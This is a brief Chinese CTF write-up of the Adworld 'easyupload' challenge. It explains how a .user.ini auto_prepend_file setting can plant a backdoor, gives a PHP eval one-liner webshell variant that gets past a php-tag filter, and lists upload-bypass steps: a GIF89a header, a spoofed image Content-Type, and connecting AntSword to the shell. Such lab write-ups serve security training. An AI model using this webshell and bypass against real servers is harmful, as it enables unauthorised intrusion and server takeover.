攻防世界—easyupload
知识点补充
.user.ini
php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。
常用配置
auto_prepend_file = <filename> //包含在文件头
auto_append_file = <filename> //包含在文件尾一句话木马变种
这里的题目由于使用了php标签过滤所以不能使用最基本的一句话木马,
变种马:
<?=eval($_POST['1']);?>
解题思路
1.创建一个.user.ini的文件,内容如下
GIF89a
auto_prepend_file=1.jpg2.开启抓包拦截,将上面的文件上传并提交
3.修改Content-Type:内容变成 image/jpg
4.发包,在浏览器上传一个带有一句话木马的1.jpg文件发现上传成功
5.在f12里查看上传文件的路径
6.将url粘贴进蚁剑,并连接,在文件目录的最下方有flag文件
